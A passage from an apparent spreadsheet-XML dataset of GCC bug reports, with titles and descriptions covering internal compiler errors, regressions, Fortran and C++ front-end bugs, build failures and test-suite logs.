PASS: gfortran.dg/nint_2.f90  -O0  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/gcc:.:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/gcc
FAIL: gfortran.dg/nint_2.f90  -O0  execution test
30        if (j1 /= 0 .or. j2 /= 0) call abort
(gdb)
Program received signal SIGABRT Aborted.
0xc0000000001fa3dc in ?? ()
(gdb) p j1
$1 = 1
(gdb) p j2
$2 = 0
(gdb) p b
$3 = 0.49999997</t>
  </si>
  <si>
    <t>GCC-11556</t>
  </si>
  <si>
    <t>ICE in gen_reg_rtx() while compiling 2.6.x Linux kernel</t>
  </si>
  <si>
    <t>gcc dies with an ice in gen_reg_rtx() while compiling
net/sunrpc/svcauth_unix.c in the 2.6.x Linux kernel.</t>
  </si>
  <si>
    <t>GCC-29138</t>
  </si>
  <si>
    <t>[4.0 Regression] access declarations don't work for classes</t>
  </si>
  <si>
    <t>class A
{
public:
  int i
  class A1
  {
    int j
  }
}
class B : private A
{
public:
  A::i
  A::A1
}
void
f ()
{
  B b
  b.i = 1
  B::A1 a1
}
The above program does not compile with the following messages:
t.cpp:15: error: declaration does not declare anything
t.cpp: In function â€˜void f()â€™:
t.cpp:6: error: â€˜class A::A1â€™ is inaccessible
t.cpp:23: error: within this context
The C++ standard section 11.3 talks about access declarators. It does not
explicitly say that inner classes can be used this way but nor does it say
they cannot. Note that the integer `i' works fine with the same idiom.</t>
  </si>
  <si>
    <t>GCC-10870</t>
  </si>
  <si>
    <t>Problems with # as comment character in asm code</t>
  </si>
  <si>
    <t>Using gcc foo.S with foo.S being an assembler file works
unless the assembler file includes comments in the style
# foo
with # being the first character in the line (gcc mistakes it as preprocessor directive).
Not 100% sure if this is a bug or an intentional feature removal used to work in older releases.
Release:
3.3
Environment:
Ark Linux 1.0 alpha 8
How-To-Repeat:
Compile e.g. syslinux 2.04</t>
  </si>
  <si>
    <t>GCC-7510</t>
  </si>
  <si>
    <t>gcc 3.1: ICE in extract_insn on RS/6k AIX (works on x86 linux)</t>
  </si>
  <si>
    <t xml:space="preserve">	I'm trying to build MatView http://www.csm.ornl.gov/~kohl/MatView/.
    It builds fine on an x86 linux system (gcc 2.96) but on an IBM RS/6000
    with gcc 3.1 I get an ICE:
cc1: warning: changing search order for system directory /usr/local/include
cc1: warning:   as it has already been specified as a non-system directory
/scratch/MatView/file.c: In function `read_coordinate':
/scratch/MatView/file.c:1912: unrecognizable insn:
(insn 1939 1674 1940 (parallel[
            (set (reg/v:SI 27 r27 [140])
                (plus:SI (gt:SI (reg:SI 9 r9 [469])
                        (const_int 0 [0x0]))
                    (reg/v:SI 27 r27 [140])))
            (clobber (reg:SI 11 r11))
        ] ) -1 (nil)
    (nil))
/scratch/MatView/file.c:1912: Internal compiler error in extract_insn at recog.c:2132
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.1
Environment:
System: AIX manila 3 4 000155349100
host: powerpc-ibm-aix4.3.2.0
build: powerpc-ibm-aix4.3.2.0
target: powerpc-ibm-aix4.3.2.0
configured with: ./configure --enable-threads=aix --disable-nls
How-To-Repeat:
	Here is uuencoded gzip -9'ed file.i
See attachments for file.i.gz.uu
</t>
  </si>
  <si>
    <t>al.danial</t>
  </si>
  <si>
    <t>GCC-17055</t>
  </si>
  <si>
    <t>ICE while folding int/float vectors</t>
  </si>
  <si>
    <t>A simple testcase compiled with -O -ffast-math aborts because we try to fold a
vector operation 0-0 to 0 by doing
  fold_convert (type integer_zero_node)
However we don't allow conversions from scalar types to vector types so this
does not work.
This fails for both integer and float vectors.
There are a number of places in fold.c where this same idiom is used.  Many of
them are probably unreachable for vector types but it isn't obvious which ones
are safe and which ones aren't.</t>
  </si>
  <si>
    <t>GCC-4760</t>
  </si>
  <si>
    <t>bug #4711 seems solved</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello
 With gcc in today's CVS HEAD I am not able to reproduce bug 4711 of
 which I am the submitter. I suggest that it should be closed and the
 bugs that it refers to should be looked at again.
Release:
unknown</t>
  </si>
  <si>
    <t>aaronl</t>
  </si>
  <si>
    <t>GCC-39025</t>
  </si>
  <si>
    <t>ICE in start_function at c-decl.c:6225 while configuring libgcc</t>
  </si>
  <si>
    <t>The configure step of libgcc aborts with
checking for suffix of object files... configure: error: in `/vol/gccsrc/obj/gcc-lto-20090127/11-gcc/sparc-sun-solaris2.11/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
config.log reveals
configure:2590: checking for suffix of object files
configure:2611: /vol/gccsrc/obj/gcc-lto-20090127/11-gcc/./gcc/xgcc -B/vol/gccsrc/obj/gcc-lto-20090127/11-gcc/./gcc/ -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include -c -g -O2    conftest.c &gt;&amp;5
conftest.c:16: internal compiler error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
configure:2614: $? = 1
configure: failed program was:
| /* confdefs.h.  */
| 
| #define PACKAGE_NAME GNU C Runtime Library
| #define PACKAGE_TARNAME libgcc
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU C Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| /* end confdefs.h.  */
| 
| int
| main ()
| {
| 
|   
|   return 0
| }
configure:2627: error: in `/vol/gccsrc/obj/gcc-lto-20090127/11-gcc/sparc-sun-solaris2.11/libgcc':
configure:2629: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
Running cc1 on this conftest.c gives
% ./cc1 conftest.c
main 
conftest.c:5: internal compiler error: in start_function at c-decl.c:6225
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The same problem happens on i386-pc-solaris2.10.</t>
  </si>
  <si>
    <t>GCC-14353</t>
  </si>
  <si>
    <t>libstdc++ wchar tests run for -mabi=32</t>
  </si>
  <si>
    <t>This is not a regression as -mabi=32 support is new to 3.4
I have just enabled testing of the -o32 ABI on my irix6.5 testsuite runs
for gcc-3.4 and gcc-3.5.
See http://gcc.gnu.org/ml/gcc-testresults/2004-02/msg01329.html for an example.
Most of the libstdc++ testsuite failures are due to the absence of 
wchar support in the -o32 ABI.  Is there a way to disable of XFAIL 
these tests for only one of the three ABI under test?
Phil Edwards [phil@codesourcery.com] says:
  If wchar isn't supported then configure should be turning it off.  If it
  isn't then there will be a zero-length objdir/testsuite/testsuite_wchar_t
  file indicating that the wchar tests should be run.  
I see that:
 - libstdc++-v3/testsuite/testsuite_wchar_t exists
 - libstdc++-v3/mabi=64/testsuite/testsuite_wchar_t exists
 - libstdc++-v3/mabi=32/testsuite/testsuite_wchar_t doesn't exist
which is correct but the tests are still run for mabi=32.
This points to a test harness issue.</t>
  </si>
  <si>
    <t>GCC-25073</t>
  </si>
  <si>
    <t>CASEs overlap</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
LOGICAL :: L
SELECT CASE(L)
CASE(.true.)
CASE(.false.)
CASE(.true.)
END SELECT
END</t>
  </si>
  <si>
    <t>GCC-7240</t>
  </si>
  <si>
    <t>gcc 3.1 ARM thumb target generates 32bis code sometimes</t>
  </si>
  <si>
    <t>gcc compiled for ARM (arm-ecos-elf) and run with -mthumb
(for 16 bit instruction set).
Occasionally when C code has auto arrays
references to the arrays are coded by gcc as:
ldr r0[r1sp]
This is legal 32-bit instruction but not a legal 16-bit
(thumb) instruction unfortunately.
Assembler accordingly rejects the instruction.
I hope Richard Earnshaw will be able to fix this soon
before it bites again... a similar or same bug has
been in the compiler previously (i filed a bug report
but was unable to send code... the problem goes away
when the function is simplified and i didn't have an
obfuscator available at the time).
Thanks in advance...
Release:
gcc 3.1
Environment:
gcc 3.1 compiled to run on sparc/solaris to cross compile
for arm target (arm-ecos-elf). 
Compiler is run w/ -mthumb (for 16 bit ins).
How-To-Repeat:
Using attached file obfu.c
gcc -mthumb -O2 obfu.c
You should see something like:
obfu.c:1933: warning: too many arguments for format
obfu.c:1939: warning: too many arguments for format
obfu.c:1943: warning: too many arguments for format
obfu.c: In function `V1208':
obfu.c:1951: warning: too many arguments for format
obfu.c: In function `V2567':
obfu.c:4440: warning: control reaches end of non-void function
/var/tmp//cc8OUOaP.s: Assembler messages:
/var/tmp//cc8OUOaP.s:307: Error: lo register required -- `ldr r0[r1sp]'
The warnings are largely due to a bug in the obfuscator
and anyway may be ignored.</t>
  </si>
  <si>
    <t>GCC-47504</t>
  </si>
  <si>
    <t>[C++0x] some constexpr calculations erroneously overflow when using negative numbers</t>
  </si>
  <si>
    <t>Created attachment 23148
overflow.cpp
Easiest to describe via code:
overflow.cpp
=================================================
char constexpr sub(char arg)
  { return char(arg - char(1)) }
int main()
  { static char constexpr m = sub(-1) }
=================================================
g++ overflow.cpp --std=c++0x
=================================================
overflow.cpp: In function â€˜int main()â€™:
overflow.cpp:5:36: error: overflow in constant expression [-fpermissive]
This is simply attempting to subtract 1 from -1 using chars.
I cannot see any reason why this should trigger an overflow error.
I have attempted to cast every intermediate state to char to avoid any unintended casts.
The code is as simple as I could get it while still triggering the seemingly erroneous overflow.
Compiles OK using int instead of char. (int can still erroneously overflow in other circumstances though. Would examples be useful?).
Compiles OK using 1 instead of -1.
Compiles OK using a literal -1 instead of a parameter.
Compiles OK if main()::m isn't constexpr.
Attached source code but it's probably easier to just copy/paste the above.
SPECS:
gcc: version 4.6.0 2010-12-30 (experimental) (svn = 168358)
 - manually patched by (http://gcc.gnu.org/ml/gcc-patches/2007-04/msg00620.html)
 - patch shouldn't have any effect here.
ubuntu: 10.10 (64 bit)
intel: core2 duo
Are any other specs relevant here such as GMP. (Note: my GMP is the standard one).
I searched other constexpr bugs here - AFAIK none appear to be about overflow.</t>
  </si>
  <si>
    <t>yacwroy</t>
  </si>
  <si>
    <t>GCC-38869</t>
  </si>
  <si>
    <t>[4.4 Regression] valgrind find problem with -O -mtune=generic</t>
  </si>
  <si>
    <t>I just tried to compile this file with the GNU C compiler
version 4.4 snapshot 20090109 using valgrind and the flags
-O3 march=native on a amd64 box.
The debug output was
==20395== Invalid read of size 2
==20395==    at 0xAFDA6E: T.911 (ira-costs.c:590)
==20395==    by 0xAFE0F0: T.910 (ira-costs.c:987)
==20395==    by 0xAFE27A: process_bb_node_for_costs (ira-costs.c:1034)
==20395==    by 0xAF66DA: ira_traverse_loop_tree (ira-build.c:1390)
==20395==    by 0xAFC207: ira_costs (ira-costs.c:1170)
==20395==    by 0xAFAA17: ira_build (ira-build.c:2775)
==20395==    by 0xAF4F19: rest_of_handle_ira (ira.c:1926)
==20395==    by 0x664FFC: execute_one_pass (passes.c:1279)
==20395==    by 0x665244: execute_pass_list (passes.c:1328)
==20395==    by 0x66525C: execute_pass_list (passes.c:1329)
==20395==    by 0x75BA9B: tree_rest_of_compilation (tree-optimize.c:419)
==20395==    by 0x8DB993: cgraph_expand_function (cgraphunit.c:1047)
==20395==  Address 0x7216754 is 804 bytes inside a block of size 1352 free'd
==20395==    at 0x4C243AF: free (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==20395==    by 0x68CEF1: init_regs (regclass.c:687)
==20395==    by 0xAAE762: gimple_expand_cfg (cfgexpand.c:2324)
==20395==    by 0x664FFC: execute_one_pass (passes.c:1279)
==20395==    by 0x665244: execute_pass_list (passes.c:1328)
==20395==    by 0x75BA9B: tree_rest_of_compilation (tree-optimize.c:419)
==20395==    by 0x8DB993: cgraph_expand_function (cgraphunit.c:1047)
==20395==    by 0x8DD6F4: cgraph_optimize (cgraphunit.c:1106)
==20395==    by 0x416C62: c_write_global_declarations (c-decl.c:8074)
==20395==    by 0x70C36C: toplev_main (toplev.c:981)
I suspect that valgrind may have found a problem.</t>
  </si>
  <si>
    <t>GCC-32689</t>
  </si>
  <si>
    <t>[4.3 regression] TRANSFER returns scalar even if MOLD is an array</t>
  </si>
  <si>
    <t>Hi
the following snippet
program gfcbug67
  implicit none
  type mytype
     integer pointer :: i(:) =&gt; NULL ()
  end type mytype
  type(mytype) :: t
  print * size (transfer (1 t% i))
end program gfcbug67
fails to compile with:
gfcbug67.f90:9.17:
  print * size (transfer (1 t% i))
                1
Error: 'array' argument of 'size' intrinsic at (1) must be an array
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-22437</t>
  </si>
  <si>
    <t>Missing array intrinsics for kind=10 and kind=16</t>
  </si>
  <si>
    <t>$ cat kind2.f90
program main
  real(kind=10) dimension(2) :: a
  integer(kind=16) dimension(2) :: b
  print *maxloc(a)maxloc(b)
end program main
$ gfortran kind2.f90
/tmp/ccKkwR8V.o(.text+0x172): In function `MAIN__':
: undefined reference to `_gfortran_maxloc0_4_r10'
/tmp/ccKkwR8V.o(.text+0x372): In function `MAIN__':
: undefined reference to `_gfortran_maxloc0_4_i16'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-61802</t>
  </si>
  <si>
    <t>[4.10 Regression] AArch64 execute.exp failures with LTO after r212467</t>
  </si>
  <si>
    <t>After r212467
Author: hubicka 
Date:   Fri Jul 11 17:43:44 2014 +0000
        * vapool.c: Include tree-ssa-alias.h gimple.h and lto-streamer.h
        (varpool_get_constructor): New function.
        (varpool_ctor_useable_for_folding_p): Break out from ...
        (ctor_for_folding): ... here use varpool_get_constructor.
        (varpool_assemble_decl): Likewise.
        * lto-streamer.h (struct output_block): Turn cgraph_node
        to symbol filed.
        (lto_input_variable_constructor): Declare.
        * ipa-visibility.c (function_and_variable_visibility): Use
        varpool_get_constructor.
        * cgraph.h (varpool_get_constructor): Declare.
        (varpool_ctor_useable_for_folding_p): New function.
        * lto-streamer-out.c (get_symbol_initial_value): Take encoder
        parameter return error_mark_node for non-trivial constructors.
        (lto_write_tree_1 DFS_write_tree): UPdate use of
        get_symbol_initial_value.
        (output_function): Update initialization of symbol.
        (output_constructor): New function.
        (copy_function): Rename to ..
        (copy_function_or_variable): ... this one handle vars too.
        (lto_output): Output variable sections.
        * lto-streamer-in.c (input_constructor): New function.
        (lto_read_body): Rename from ...
        (lto_read_body_or_constructor): ... this one handle vars
        too.
        (lto_input_variable_constructor): New function.
        * ipa-prop.c (ipa_prop_write_jump_functions
        ipa_prop_write_all_agg_replacement): Update.
        * lto-cgraph.c (compute_ltrans_boundary): Use it.
        (output_cgraph_opt_summary): Set symbol to NULL.
        * lto-partition.c (add_references_to_partition): Use
        varpool_ctor_useable_for_folding_p.
        * lto.c (lto_read_in_decl_state): Update sanity check.
I'm seeing a number of failures in gcc.c-torture/execute/ on the -flto variants including:
FAIL: gcc.c-torture/execute/20000422-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20000422-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20001013-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20001013-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20011113-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20011113-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20020615-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20020615-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20040805-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20040805-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20050929-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20050929-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20071210-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20071210-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20081117-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20081117-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20120427-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20120427-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/20120919-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20120919-1.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/921113-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/921113-1.c execution  -O2 -flto</t>
  </si>
  <si>
    <t>GCC-41904</t>
  </si>
  <si>
    <t>graphite-clast-to-gimple.c will not build</t>
  </si>
  <si>
    <t>I just tried to boostrap 4.5 snapshot 20091029 and the build said
/home/dcb/gcc/20091029/working/./prev-gcc/xgcc -B/home/dcb/gcc/20091029/working/./prev-gcc/ -B/home/dcb/gcc/20091029/results/x86_64-unknown-linux-gnu/bin/ -B/home/dcb/gcc/20091029/results/x86_64-unknown-linux-gnu/bin/ -B/home/dcb/gcc/20091029/results/x86_64-unknown-linux-gnu/lib/ -isystem /home/dcb/gcc/20091029/results/x86_64-unknown-linux-gnu/include -isystem /home/dcb/gcc/20091029/results/x86_64-unknown-linux-gnu/sys-include    -c-g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../src/gcc-4.5-20091029/gcc -I../../src/gcc-4.5-20091029/gcc/. -I../../src/gcc-4.5-20091029/gcc/../include -I../../src/gcc-4.5-20091029/gcc/../libcpp/include-I../../src/gcc-4.5-20091029/gcc/../libdecnumber -I../../src/gcc-4.5-20091029/gcc/../libdecnumber/bid -I../libdecnumber  -DCLOOG_PPL_BACKEND    ../../src/gcc-4.5-20091029/gcc/graphite-clast-to-gimple.c -o graphite-clast-to-gimple.o
In file included from /usr/include/cloog/cloog.h:45:0
                 from ../../src/gcc-4.5-20091029/gcc/graphite-clast-to-gimple.c:46:
/usr/include/cloog/ppl_backend.h:173:18: note: originally defined here
/usr/include/cloog/ppl_backend.h:190:18: note: originally defined here
cc1: warnings being treated as errors
../../src/gcc-4.5-20091029/gcc/graphite-clast-to-gimple.c: In function 'clast_to_gcc_expression':
../../src/gcc-4.5-20091029/gcc/graphite-clast-to-gimple.c:167:10: error: enum constant defined in struct or union is not visible in C++
/usr/include/cloog/clast.h:9:12: note: enum constant defined here
../../src/gcc-4.5-20091029/gcc/graphite-clast-to-gimple.c:200:10: error: enum constant defined in struct or union is not visible in C++
/usr/include/cloog/clast.h:9:33: note: enum constant defined here
The build fails because graphite-clast-to-gimple.c will not compile.
This same problem also appeared in the previous snapshot 20091022 but
the snapshot before that 20091015 was fine.
I suspect some code change between 20091015 and 20091022.</t>
  </si>
  <si>
    <t>GCC-40031</t>
  </si>
  <si>
    <t>[4.5 Regression] ARM broken with addresses in PHIs with -fPIC</t>
  </si>
  <si>
    <t>Testcase:
double c
double d
double *f(int a)
{
  if(a) return 
  return 
}</t>
  </si>
  <si>
    <t>GCC-23598</t>
  </si>
  <si>
    <t>iostat handling after library error return</t>
  </si>
  <si>
    <t>$ cat tst.f90
program main
  real :: a
  integer :: ios
  open (10 pad='no')
  write (10 '(A)') '1''1'
  rewind (10)
  read (10'(I2)'iostat=ios) i
  ios = -4321
  read (10 '(I1)' iostat=ios) i
  print *ios
end program main
$ gfortran tst.f90
$ ./a.out
       -4321
Here's a patch:
Index: lock.c
===================================================================
RCS file: /cvs/gcc/gcc/libgfortran/io/lock.cv
retrieving revision 1.8
diff -c -p -r1.8 lock.c
*** lock.c      17 Aug 2005 02:48:56 -0000      1.8
--- lock.c      27 Aug 2005 22:10:48 -0000
*************** library_start (void)
*** 5460 ****
       stay within the library. */
    g.in_library = 1
!   if (ioparm.iostat != NULL &amp;&amp; ioparm.library_return == LIBRARY_OK)
      *ioparm.iostat = ERROR_OK
    ioparm.library_return = LIBRARY_OK
--- 5460 ----
       stay within the library. */
    g.in_library = 1
!   if (ioparm.iostat != NULL)
      *ioparm.iostat = ERROR_OK
    ioparm.library_return = LIBRARY_OK</t>
  </si>
  <si>
    <t>GCC-12820</t>
  </si>
  <si>
    <t>ICE with -mpowerpc64 on 32bit PPC targets</t>
  </si>
  <si>
    <t>$ cat bug.c
int f (unsigned long long ull) { return ull &gt;= 0x8000000000000000ull }
$ gcc -mpowerpc64 bug.c
bug.c: In function `f':
bug.c:4: error: unrecognizable insn:
(insn 33 32 34 0 0x0 (set (reg:DI 121)
        (ior:DI (reg:DI 121)
            (const_int -65536 [0xffff0000]))) -1 (nil)
    (nil))
bug.c:4: internal compiler error: in extract_insn at recog.c:2175</t>
  </si>
  <si>
    <t>GCC-47270</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] GCC produces unnecessary code on -O2 and -O3 levels</t>
  </si>
  <si>
    <t>$ cat &gt; testcase.c
register int r asm(esi)
void foo(void)
{
    if (r)
        __asm__(sar\t%0 : +r (r))
    __asm__(sar\t%0 : +r (r))
}
^D
$ gcc -O2 -S testcase.c
$ cat testcase.s
[...]
foo:
.LFB0:
        xorl    %eax %eax
        testl   %esi %esi
        je      .L2
#APP
# 6 testcase.c 1
        sar     %esi
# 0  2
#NO_APP
        movl    %esi %eax
.L2:
        movl    %eax %esi
#APP
# 8 testcase.c 1
        sar     %esi
# 0  2
#NO_APP
        ret
[...]</t>
  </si>
  <si>
    <t>GCC-80442</t>
  </si>
  <si>
    <t>Rejects DATA statement with array slice</t>
  </si>
  <si>
    <t>The following code is rejected even though it is as far as I can see valid Fortran.
$ cat test.f90
program main
    implicit none
    integer:: i
    integer dimension(4):: j
    data (j(i:i) i=14) /1 2 3 4/
end program
$ gfortran test.f90
test.f90:5:10:
     data (j(i:i) i=14) /1 2 3 4/
          1
Error: Data element below array lower bound at (1)</t>
  </si>
  <si>
    <t>koenigni</t>
  </si>
  <si>
    <t>GCC-15177</t>
  </si>
  <si>
    <t>G++ produces wrong mangling in a large project</t>
  </si>
  <si>
    <t>A wrong mangled name was generated by g++. The wrongly generated name was for a
templatized class method. I can't reproduce it with a simple example (see
example.cpp below) so I will use a large pre-processed file to present the case.
Please try to compile the pre-processed source code below (tbhqmc-driver.ii). 
This problem is known to happen with:
- g++ 3.3.1 (cygwin)
- g++ 3.2.2 (linux/redhat 9)
If you see the postprocessed file lines 36329-36334 there are two template
class methods named PostpxPDensity: one with a single argument the other with
four arguments. It gets called in lines 37456 and 44768 in the same file.
Now compile that file and inspect the assembled file (the *.s attachment
below). At line 7627 the first method (single-argument) was called
(This corresponds to line 44768 of the preprocessed source above):
call
__ZN11Hubbard_QMC14PostpxPDensityI22QMBS_Observables_FloatEEvRN12QMBS_HubbardI20EllipsoidRectLatticeILj1EE19AFQMC_BP_boson_repsI18__temporary_BvInfoEE15ObservablesBaseIT_EE
The method gets demangled into:
void Hubbard_QMC::PostpxPDensity
(QMBS_Hubbard
AFQMC_BP_boson_reps
&gt;::ObservablesBase &gt;&amp;)
This is plain WRONG for the following reasons:
* There is no such method template in Hubbard_QMC class which accepts two
arguments. 
* There is also no sub-class ObservablesBase
in class AFQMC_BP_boson_reps.
Something must have been wrong inside cc1plus!
DETAILED VERSION INFO
FOR CYGWIN:
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/3.3.1/specs
Configured with: /GCC/gcc-3.3.1-3/configure --with-gcc --with-gnu-ld
--with-gnu-as --prefix=/usr --exec-prefix=/usr --sysconfdir=/etc
--libdir=/usr/lib --libexecdir=/usr/sbin --mandir=/usr/share/man
--infodir=/usr/share/info --enable-languages=cadac++f77pascaljavaobjc
--enable-libgcj --enable-threads=posix --with-system-zlib --enable-nls
--without-included-gettext --enable-interpreter --enable-sjlj-exceptions
--disable-version-specific-runtime-libs --enable-shared --disable-win32-registry
--enable-java-gc=boehm --disable-hash-synchronization --verbose
--target=i686-pc-cygwin --host=i686-pc-cygwin --build=i686-pc-cygwin
Thread model: posix
gcc version 3.3.1 (cygming special)
FOR LINUX (redhat 9):
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)</t>
  </si>
  <si>
    <t>GCC-20695</t>
  </si>
  <si>
    <t>sh64-*-* port deos not handle 32 / 64 bit conversions properly</t>
  </si>
  <si>
    <t>The sh64-*-* port plays fast and loos with the distinction between 32 and 64 bit
values.  In particular it pretends a truncation from 64 to 32 bit is a no-op
while a sign extension is needed and that the sh5-32media and sh-compact
subtargets can expose the indexed addressing mode directly to the compiler
which is wrong too since this addressing mode uses 64 bit arithmetic and
traps on all existing hardware if the result is not a valid 64 bit address.
On the other hand sign extensions are usually no-ops.
Moreover the target address of a branch should not be hardwired to DImode
but always be Pmode.
The merge I am working on addresses all these issues but it depends on all
LABEL_REFS to have Pmode VOIDmode LABEL_REFs cause reload failures.</t>
  </si>
  <si>
    <t>GCC-55844</t>
  </si>
  <si>
    <t>-fsanitize=address -Os -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer -m64 doesn't work</t>
  </si>
  <si>
    <t>c-c++-common/asan/null-deref-1.c fails with -m64 since
-fsanitize=address -Os -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer -m64 
still omit frame pointer:
[hjl@gnu-tools-1 gcc]$  cat /tmp/x.c
void
NullDeref(int *ptr)
{
  ptr[10]++
}
[hjl@gnu-tools-1 gcc]$ /export/build/gnu/gcc-x32-mx32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32-mx32/build-x86_64-linux/gcc/ /tmp/x.c   -S   -Os  -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer   -m64 -fsanitize=address
[hjl@gnu-tools-1 gcc]$ cat x.s
	.file	x.c
	.text
	.globl	NullDeref
	.type	NullDeref @function
NullDeref:
.LFB0:
	.cfi_startproc
	movq	%rdi %rax
	leaq	40(%rdi) %rdi
	movabsq	$17592186044416 %rdx
	movq	%rdi %rcx
	shrq	$3 %rcx
	movb	(%rcx%rdx) %dl
	movq	%rdi %rcx
	andl	$7 %ecx
	addl	$3 %ecx
	cmpb	%dl %cl
	jl	.L2
	testb	%dl %dl
	je	.L2
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6 -16
	movq	%rsp %rbp
	.cfi_def_cfa_register 6
	call	__asan_report_load4
.L2:
	.cfi_def_cfa 7 8
	.cfi_restore 6
	incl	40(%rax)
	ret
	.cfi_endproc
.LFE0:
	.size	NullDeref .-NullDeref
	.section	.text.startupax@progbits
	.type	_GLOBAL__sub_I_00099_0_NullDeref @function
_GLOBAL__sub_I_00099_0_NullDeref:
.LFB1:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6 -16
	movq	%rsp %rbp
	.cfi_def_cfa_register 6
	popq	%rbp
	.cfi_def_cfa 7 8
	jmp	__asan_init
	.cfi_endproc
.LFE1:
	.size	_GLOBAL__sub_I_00099_0_NullDeref .-_GLOBAL__sub_I_00099_0_NullDeref
	.section	.init_array.00099aw
	.align 8
	.quad	_GLOBAL__sub_I_00099_0_NullDeref
	.ident	GCC: (GNU) 4.8.0 20130101 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-tools-1 gcc]$ /export/build/gnu/gcc-x32-mx32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32-mx32/build-x86_64-linux/gcc/ /tmp/x.c   -S   -Os  -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer   -m64 
[hjl@gnu-tools-1 gcc]$ cat x.s
	.file	x.c
	.text
	.globl	NullDeref
	.type	NullDeref @function
NullDeref:
.LFB0:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6 -16
	incl	40(%rdi)
	movq	%rsp %rbp
	.cfi_def_cfa_register 6
	popq	%rbp
	.cfi_def_cfa 7 8
	ret
	.cfi_endproc
.LFE0:
	.size	NullDeref .-NullDeref
	.ident	GCC: (GNU) 4.8.0 20130101 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-tools-1 gcc]$</t>
  </si>
  <si>
    <t>GCC-58579</t>
  </si>
  <si>
    <t>Memory allocation fails when calling character-valued function</t>
  </si>
  <si>
    <t>This is a problem I found with gfortran 4.6.3 4.7.3 4.8.0 on
$ uname -a
Linux 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ gfortran -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gfortran-4.8
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
